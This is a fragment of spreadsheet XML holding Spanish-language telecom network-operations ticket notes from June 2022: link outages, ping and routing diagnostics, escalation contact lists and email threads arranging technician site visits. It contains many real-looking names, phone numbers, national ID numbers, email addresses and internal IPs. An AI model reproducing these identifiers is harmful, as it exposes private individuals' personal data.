!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.201.12.131 PING STATISTICS ---
    3000 PACKET(S) TRANSMITTED
    3000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/3/22 MS
&lt;HHERCRMPN1W1N01O01EIM1&gt;
.</t>
  </si>
  <si>
    <t>F4598323</t>
  </si>
  <si>
    <t>TIEMPOS ACUMULADOS
	WO OPEN                                			5:15
1/5	JIMMY ZELAYA	7986-9465	2 HORAS	7:15:00
2/5	EDUARDO GONZALEZ	7855-4483	3 HORAS	8:15:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	9:15:00
4/5	OSCAR HERNANDEZ 	7855-0164	5 HORAS	11:15:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	13:15:00</t>
  </si>
  <si>
    <t>SE LLAMA A SUP PARA ACTUALIZACION SIN OBTENER RESPUESTA
2001696779
COLA:
NOMBRE: A: 50378554483
NÚMERO: 50378554483
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50378554483
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 12/06/2022 08:04:40</t>
  </si>
  <si>
    <t>INOCENTE FLORES TECNICO EN CAMPO REALIZANDO CORRECCIONES EN MEDIO</t>
  </si>
  <si>
    <t>ASIGNACION PARA VALIDAR MEDIO DE COBRE</t>
  </si>
  <si>
    <t>F4598329</t>
  </si>
  <si>
    <t>SERVICIO CAIDO
	WO OPEN                                			13:30
1/4	INGENIERO DE IM 	7002-8958	2 HORAS	15:30:00
2/4	MARCO SALAZAR 	7002-0778	3 HORAS	16:30:00
3/4	GILBERTO FERNANDEZ		5 HORAS	18:30:00
4/4	LUIS IVAN ORTIZ	7002-5268	6 HORAS	19:30:00</t>
  </si>
  <si>
    <t>SE REENVIO CORREO A CLIENTE
RE: ENLACE CAÍDO DE PALI BARRIO CORAZON DE JESUS ID: CONTR0001852703OC
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITAMOS SU APOYO BRINDANDO EN REALIZAR PRUEBAS DE PRIMER NIVEL, Y COMPARTIRNOS LA SIGUIENTE INFORMACIÓN.
*CONTACTO LOCAL
*DIRECCIÓN DEL SITIO
*HORARIO DE ATENCIÓN
*REGISTRO FOTOGRÁFICO DEL EQUIPO
TICKET: F4598329
ID: CONTR0001852703OC¿
IDENTIFICADOR DEL CLIENTE: CC_WALMART_CR_TIENDA_0743
SAN JOSE,ASERRI,BARRIO CORAZON DE JESUS
.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE SOLICITANDO PRUEBAS DE PRIMER NIVEL
ASUNTO:  RE: ALARMA PROACTIVA OPERADORA DE TIENDAS
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITAMOS DE SU APOYO EN REALIZAR PRUEBAS DE PRIMER NIVEL, Y COMPARTIRNOS LA SIGUIENTE INFORMACIÓN.
*CONTACTO LOCAL
*DIRECCIÓN DEL SITIO
*HORARIO DE ATENCIÓN
*REGISTRO FOTOGRÁFICO DEL EQUIPO
TICKET: F4598329
ID: CONTR0001852703OC¿
IDENTIFICADOR DEL CLIENTE: CC_WALMART_CR_TIENDA_0743
SAN JOSE,ASERRI,BARRIO CORAZON DE JESUS¿
SALUDOS.
.</t>
  </si>
  <si>
    <t>PE 10.179.36.6
PING -C 1500 -M 30 -B -VPN DATOS_WALMART 10.201.12.156
CAIDO
&lt;HHERCRMPN1W1N01O01EIM1&gt;PING -C 1500 -M 30 -B -VPN DATOS_WALMART 10.201.12.156
  PING 10.201.12.156: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    ...................................................................................................................................................................................................................................................................</t>
  </si>
  <si>
    <t>SE ENVIAN DATOS DE PERSONAL TÉCNICO A CL, || TIEMPO DE LLEGADA 2 HORAS APROX.
DE: JAIME JOSUE HERNANDEZ CASTILLO
ENVIADO: DOMINGO, 12 DE JUNIO DE 2022 14:17
PARA: CORPOWALMART; STEVEN MARQUEZ (VENDOR); JURGEN RENE BOCH CAAL; NOE PEREZ (VENDOR); CNOCCA; GRUPO N1
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA; CNOCCA
ASUNTO: RE: ENLACE CAÍDO DE PALI BARRIO CORAZON DE JESUS ID: CONTR0001852703OC
ESTIMADO CLIENTE
   SOLICITAMOS SU APOYO EN COORDINAR Y AUTORIZAR EL ACCESOS A NUESTRO PERSONAL TÉCNICO:
FABIAN VASQUEZ CAMPOS ID:2054600212
EDGARDO MURILLO MEJIA ID:503610837
PEDRO ARCE BOLAÑOS ID: 206740836
PERSONAL, ESTARÁ LLEGANDO EN 2 HORAS APROXIMADAMENTE.
SALUDOS
ENVIADO DESDE CORREO PARA WINDOWS</t>
  </si>
  <si>
    <t>F4598354</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA CLIENTE JERALD TORRES PARA AVANCES, SE VERIFICA F4598354 EN WO PC, SE LE INFORMA QUE SE HICIERON CAMBIOS EN LAS NEGOCIACIONES Y SI PUEDE VALIDAR, CONFIRMA QUE EL SERVICIO YA ESTA OPERATIVO Y ESTABLE, AUTORIZA PROCEDER CON EL CIERRE DEL TICKET*/*/*SE NOTIFICA A GESTOR ERITO.TECU POR SKYPE*/*/*/</t>
  </si>
  <si>
    <t>F4598358</t>
  </si>
  <si>
    <t>*/*/*/CASO F4598358 NO APLICA PC, POR FAVOR DAR SEGUIMIENTO, SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR TECUN - 37610279 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001927595</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KRYSTOPHER LETONA  1755 EXT 10557 MENCIONA QUE NO CUENTAN CON PERSONAL EN PR POR LO QUE SOLICITA SE LLAME A  VICTOR TECUN - 37610279
-ID 2001924831</t>
  </si>
  <si>
    <t>F4598359</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERARDO MARTINEZ  87430416 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001783910
**</t>
  </si>
  <si>
    <t>F4598363</t>
  </si>
  <si>
    <t>F4598432</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN CORADO 59223764 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001805015</t>
  </si>
  <si>
    <t>F4598451</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  AMILCAR RIVERA 56956068 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001805877 - 2001806099</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LORENA REYNOSO 56956594 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001806481</t>
  </si>
  <si>
    <t>F4598481</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ROBERTO GARCÍA/CLIENTE 00 525551745299 SE LE PIDE APOYO PARA SEGUIMIENTO DEL TICKET, INDICA QUE VERIFICARÁ Y NOS APOYARÁ CONTESTANDO EL CORREO</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON PERSONAL TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ/HABLÓ CON JULIO GONZÁLEZ/CLIENTE 00 525551745299 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 50687292757 KARINA QUIEN COMENTA QUE SE LE LLAME EN UNOS 10 MINUTOS SOLO VALIDARA CON ALGUIEN MAS
1001933803
COLA:
NOMBRE: A: 50687292757
NÚMERO: 50687292757
DURACIÓN: 0:01:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50687292757
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 23/06/2022 15:42:48</t>
  </si>
  <si>
    <t>SE EVIA  CORREO A LAURA  (TELMEX EN ESPRA DE COMENTARIOS)
RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
JONATHAN EDUARDO TEZEN MEJIA
BUEN DÍA  ESTIMADA LAURA  ,
SERIA  TAN AMABLE  DE VALIDAR LO INDICADO POR NUESTRO PERSONAL TECNICO POR FAVOR
*****
BUENAS TARDES,
CLARO. DE NUESTRO LADO YA LOS EQUIPOS ESTÁN OPERATIVOS Y EL CLIENTE NOS DEJÓ DE ATENDER.
NOS PODRÍAN INDICAR ¿QUIÉN NOS PUEDE RECIBIR HOY PARA ENVIAR EL PERSONAL?
CIERTAMENTE  EL DIA DE AYER  SE ENCONTRO EQUI CTC QUEMADO EN EDIFICIO 1 EL CUAL FUE CAMBIADO POR NUESTRO PERSONAL TECNICO, SEGUN INDICACIONES DE PERSONAL IT DE CARGILL CLARO PROVEE HASTA EL EQUIPO CTC  YA QUE EL ROUTER FINAL ES ADMINISTRADOS POR ELLOS ,
REMOTAMENTE TENEMOS ALCANCE AL EQUIPO ULTIMA MILLA DE CLARO,
&lt;HBELCRABN1W1N01O011AM1&gt;DISPLAY INT DESC | IN 850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VLANIF850                     UP      UP       CARGILL_BUSINESS_SERVICES_EL_CAFETAL1(CONTR0002076666OC)
QUEDARIA  QUE PERSONAL IT DE CLIENTE VALIDE LA CONFIGURACION DE SU EQUIPO ROUTER,
QUEDAMOS  A LA ESPERA DE SU CONFIRMACION , SI FUERA NECESARIO DESPLAZAR A NUESTRA AREA TECNICA  LE AGRADECEMOS  INDICARNOS QUIEN SERIA EL CONTACTO Y EN QUE HORARIO SE PUEDE VISITAR
SALUDOS</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO CON DOCUMENTACION SOLICITADA
SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
JONATHAN EDUARDO TEZEN MEJIA
BUENA TARDE ESTIMADA LAURA
 GUSTO EN SALUDARLE LE ADJUNTO LO SOLICITADO, POR FAVOR CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN
SALUDOS,
RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;
BUENA TARDE JONATHAN
TAL COMO COMENTADO EN EL AUDIO QUEDAMOS ATENTOS DE LA LLEGADA DE LA DOCUMENTACIÓN ANTES DE LAS 13:00 HRS LT.
SALUDOS | REGARDS
 CID:LOGO2UNINET_E0EF9C70-513E-4183-9E70-A9B356F1F340.JPG
LAURA LILIA RODRÍGUEZ HERNÁNDEZ
OPER CIAP GESTION Y SOPORTE SR
TEL.+52 (55) 5174 5299
SOLIS ARCE, ANDRES MAURICIO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MELISSA GONZÁLEZ 50687292757 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001097866</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELISSA GONZALEZ 87292757 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001928982</t>
  </si>
  <si>
    <t>SE HABLÓ CON MELISSA GONZÁLEZ/PR 506 87292757 INDICA QUE VA DE SALIDA Y LOS EQUIPOS ESTÁN EN OTRO EDIFICIO, PIDE SE LE LLAME MAÑANA A LAS 09:15AM PARA SEGUIMIENTO, SE INFORMA LO DICHO POR PR A TELMEX CENTRAL VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN</t>
  </si>
  <si>
    <t>***---SE ENVÍA CORREO A CL SOLICITANDO AVANCES PARA LA OBTENCIÓN DE DATOS. --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 13 DE JUNIO DE 2022 04:41
PARA: 'CNOC INTERNACIONAL' &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; 'GARCIA SANCHEZ E SERGIO IVANHOE' &lt;SGSANCHE@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
BUENOS DÍAS ESTIMADOS CNOC INTL.
                SEGÚN LO CONVERSADO CON LA SEÑORITA FRIDA, CONTINUAMOS A LA ESPERA DE LOS DATOS Y DAR SEGUIMIENTO AL CASO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>***---  SE RESPONDE CORREO A CL Y SE INDICAN AVANCES ADICIONAL SE AGREGA A GRUPO DE CCC DEBIDO A QUE FUE SACADO DE LA COLA POR JONATHAN TEZEN  ---***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 16 DE JUNIO DE 2022 00:22
PARA: CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; GABRIELA.ORANTES@CLARO.COM.GT; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; BYRON.JUAREZ@CLARO.COM.GT
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
BUENOS DÍAS ESTIMADO SR. CASTAÑEDA.
                LAMENTAMOS LOS INCONVENIENTES, PERSONAL A CARGO NOS INDICA QUE SE TIENE ESCALADO EL TEMA DE LAS CERTIFICACIONES CON EL ÁREA COMERCIAL Y ESPERAMOS CONTAR CON AVANCES EL DÍA DE HOY EN HORARIO HÁBIL.
ADICIONAL SE CONTINUA EN CONVERSACIONES CON EL CLIENTE FINAL QUE IMPARTIRÁ LA CAPACITACIÓN EL DÍA VIERNES.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CASTAÑEDA CUEVAS CARLOS EMILIO [MAILTO:CCCUEVAS@UNINET.COM.MX]
ENVIADO EL: JUEVES, 16 DE JUNIO DE 2022 00:00
PARA: GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; RODRIGUEZ HERNANDEZ LAURA LILIA &lt;RHERNANL@UNINET.COM.MX&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; BYRON.JUAREZ@CLARO.COM.GT; GABRIELA.ORANTES@CLARO.COM.GT
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
ESTIMADOS,
SU APOYO PARA COMPARTIR AVANCES.
SALUDOS
C. EMILIO CASTAÑEDA CUEVAS
OPER CIAP GESTION Y SOPORTE JR
CENTRO NACIONAL DE OPERACIÓN DE REDES DE CLIENTES
CORREO: CCCUEVAS@UNINET.COM.MX
TEL. +52 55 5174-5299
CORREO: CNOC.INTL@UNINET.COM.MX
DE: GARCIA SANCHEZ E SERGIO IVANHOE
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 07:26 P.M.
PARA: GARCIA SANCHEZ E SERGIO IVANHOE; RODRIGUEZ HERNANDEZ LAURA LILIA; JONATHAN EDUARDO TEZEN MEJIA; RUIZ GARCÍA KARINA; EDUARDO LUIS PINEDA ZELEDA; CNOC INTERNACIONAL; BYRON.JUAREZ@CLARO.COM.GT
CC: GRUPO N1; CNOCCA; LUIS MIGUEL IXCOT MORALES
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
+ BYRON.JUAREZ@CLARO.COM.GT
BUENAS TARDES, BYRON.
TU APOYO POR FAVOR.
SALUDOS.
DE: GARCIA SANCHEZ E SERGIO IVANHOE
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 06:02 P.M.
PARA: RODRIGUEZ HERNANDEZ LAURA LILIA; JONATHAN EDUARDO TEZEN MEJIA; RUIZ GARCÍA KARINA; EDUARDO LUIS PINEDA ZELEDA; CNOC INTERNACIONAL
CC: GRUPO N1; CNOCCA; LUIS MIGUEL IXCOT MORALES
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
QUE TAL, ESTIMADOS.
NOS COMPARTEN SUS AVANCES POR FAVOR.
SALUDOS.
SERGIO GARCÍA SÁNCHEZ
OPER CIAP GESTION Y SOPORTE JR
CENTRO NACIONAL DE OPERACIÓN DE REDES DE CLIENTES
TEL.: (52) 55 51 74 52 99
DE: RODRIGUEZ HERNANDEZ LAURA LILIA
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 01:14 P.M.
PARA: JONATHAN EDUARDO TEZEN MEJIA; GARCIA SANCHEZ E SERGIO IVANHOE; RUIZ GARCÍA KARINA; EDUARDO LUIS PINEDA ZELEDA; CNOC INTERNACIONAL
CC: GRUPO N1; CNOCCA; LUIS MIGUEL IXCOT MORALES
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
ESTIMADOS
EL CURSO SE IMPARTIRÍA EL VIERNES A LAS 9:00 AM, FAVOR ENVIAR PLANILLAS CCSS,INS Y CERTIFICACIONES DE PAGO DE LA MISMA, AÑADIDO A ESTO INDICAR NOMBRE DE COLABORADORES.
SALUDOS | REGARDS
   	LAURA LILIA RODRÍGUEZ HERNÁNDEZ
OPER CIAP GESTION Y SOPORTE SR
TEL.+52 (55) 5174 5299
DE: JONATHAN EDUARDO TEZEN MEJIA [MAILTO:JONATHAN.TEZENM@CLARO.COM.GT]
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 10:17 A.M.
PARA: GARCIA SANCHEZ E SERGIO IVANHOE; RUIZ GARCÍA KARINA; EDUARDO LUIS PINEDA ZELEDA; CNOC INTERNACIONAL
CC: GRUPO N1; CNOCCA; LUIS MIGUEL IXCOT MORALES
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
BUEN DIA  ESTIMADO CLIENTE
ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA COMUNICARLE QUE NUESTRA ÁREA TÉCNICA SE DIRIGE  AL PUNTO SOLICITAMOS POR FAVOR BRINDAR ACCESO
TÉCNICOS ,
BAYARDO VALLADARES MEJIA ID:155833036213
WILLIAM MEJIA CHAVARRIA ID: 155829495508
WILLIAM GUTIÉRREZ CARRILLO CÉDULA 1-1259-0131
AGRADEZCO LA ATENCIÓN Y QUEDO ATENTO A SUS COMENTARIOS</t>
  </si>
  <si>
    <t>***--- SE ENVÍAN DATOS DEL PERSONAL TÉCNICO A TELMEX --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 05:15
PARA: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; 'GREIVIN PEREZ' &lt;GREIVIN.PEREZ@ERICSSON.COM&gt;; 'BRAYNER VEGA' &lt;BRAYNER.VEGA@ERICSSON.COM&gt;; IM &lt;IM@CLARO.CR&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; DIAZ GARCIA, KATERINE FABIOLA &lt;KATERINE.DIAZ@CLARO.COM.GT&gt;; JUAN.DELGADO@FSO-CA.COM; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; CCR CR &lt;CCR-CR@CLARO.CR&gt;; PEREZ DIAZ, JOSE PABLO &lt;JOSE.PEREZ@CLARO.CR&gt;; KARINA DANIELA BONILLA LEITON &lt;KARINA.BONILLA@CLARO.CR&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; CCR CR &lt;CCR-CR@CLARO.CR&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002076666OC ::: IMCRL004795 ::: LINK DOWN
BUENOS DÍAS ESTIMADOS CNOC INTL.
                ADJUNTO DATOS DEL PERSONAL TÉCNICO QUE ATENDERÁ LA VISITA.
DAVID NAVARRO HERRERA ID 101930872
DELBER CASTRILLO DELGADO ID 112330889
FREDDY CHENG NG ID 112270397
KEVIN ARIAS GALLARDO ID 115100944
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELISSA GONZÁLEZ 50687292757 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001130271
**</t>
  </si>
  <si>
    <t>MELISSA GONZÁLEZ 50687292757 (CLIENTE)  INFORMA QUE ESTA NUEVAMENTE DE SALIDA, COMENTA QUE EL DÍA DE MAÑANA PUEDE APOYAR CON LAS PRUEBAS, SOLICITA SE LE LLAME PUNTUALMENTE A LAS 8:00 HRS -*
-*</t>
  </si>
  <si>
    <t>F4598501</t>
  </si>
  <si>
    <t>SE REVISA EN DOCUMENTACION SE VALIDA QUE ES  UN ENLACE CON PROVEEDOR DE SERVICIOS UFINET SE PROCEDE CON ENVIAR CORREO PARA APERTURA DE CORREO ELECTRONICO.</t>
  </si>
  <si>
    <t>SE PROCEDE A  DEJAR EN ETAPA DE PENDIENTE ¿PROVEEDOR PARA ESPERAR AVANCES DEL MISMO</t>
  </si>
  <si>
    <t>F4598510</t>
  </si>
  <si>
    <t>SE LE LLAMA A PR ENCARGADO DE TURNO  | VANESA 77655246, 77655245, 41881483. ID: 2001686364 / 2001686328 / 2001686393 / ATIENDE: JOSE ALBERTO , INDICA QUE NO HAY ENERGIA EN SITIO DESDE LAS 18:00 HRS O ANTES (APROX), Y DEBIDIO A ELLO NO TIEN SERVICIO, SE NOTIFICA A GESTOR ROBERTO.GARCIA VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4598537</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TELMEX, RESPONDE KARINA, SE LE PROPORCIONA TICKET INTERNO Y CONFIRMA QUE TICKET YA SE ENCUENTRA CERRADO POR LO AUTORIZA CIERRE DEL PRESENTE CASO. EL SERVICIO SE ENCUNTRA OPERATIVO SIN INTERVENCION DE CLARO.
2001702953
COLA:
NOMBRE: A: 00525551745290
NÚMERO: 00525551745290
DURACIÓN: 0:03:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 00525551745290
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/06/2022 09:13:56</t>
  </si>
  <si>
    <t>F4598561</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE CLORIBERTO HERNANDEZ, SE DESCARTAN PRUEBAS DE PRIMER NIVEL, CONFIRMA LOS SIGUIENTES DATOS
CONTACTO EN SITIO: CLORBERTO HERMANDEZ 37603912 MARIELA 59517006
DIRECCION: CONTON EL CENTRO, A UN COSTADO DEL EDIFICIO  DE LA MUNICICIPALIDAD, EL QUETZAL, SAN MARCOS.
PERMISOS:  IDENTIFICACION SOLAMENTE, ENVIAR DATOS DE LOS TECNICOS A LOS CORRES: TIC-TELECOM@BANRURAL.COM.GT; AG448@BANRURAL.COM.GT; HERNADEZ.CLORIBERTO1991@GMAIL.COM
HORARIO DE ATENCION: 8:00 A 17:00 HORAS</t>
  </si>
  <si>
    <t>F4598573</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SOLMER LÓPEZ AL  504 32107325 CONFIRMA QUE SE PUEDE PROCEDER CON EL CIERRE DEL TICKET **
- ID 2001784302
**</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SERVICIO SE ENCUENTRA CAIDO A NIVEL WAN NO SE ALCANZA EL CPE.
PING HACIA ROUTER CPE:
PING -M 10 -Q 10.2.40.34
  PING 10.2.40.34: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.2.40.34 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.32.37
DISPLAY IP ROUTING-TABLE 10.2.40.34
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : _PUBLIC_
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.2.40.32/29  DIRECT  0    0             D   10.2.40.37      GIGABITETHERNET1/0/3.104			</t>
  </si>
  <si>
    <t>F4598723</t>
  </si>
  <si>
    <t>UFINET REPONDE CON TICKET DE ¿TIK-174087-Z5Y8¿ PARA DARLE SEGUIMIENTO.  SE PORCEDE A COLOCAR EN ETAPA PENDIENTE PROVEEDOR .</t>
  </si>
  <si>
    <t>SE PROECEDE A COLOCAR EL TTK EN ETAPPA PENDIENTE PROVEEEDOR</t>
  </si>
  <si>
    <t>TICKET PROPORCIONADO POR UFINET SE PORCEDE A ESPERAR QUE BRINDE ALGUN AVANCE POR EL PORVEEDOR
TIK-174087-Z5Y8¿</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO ES NECESARIO REALIZAR VALIDACIONES A NIVEL DE ULTIMA MILLA
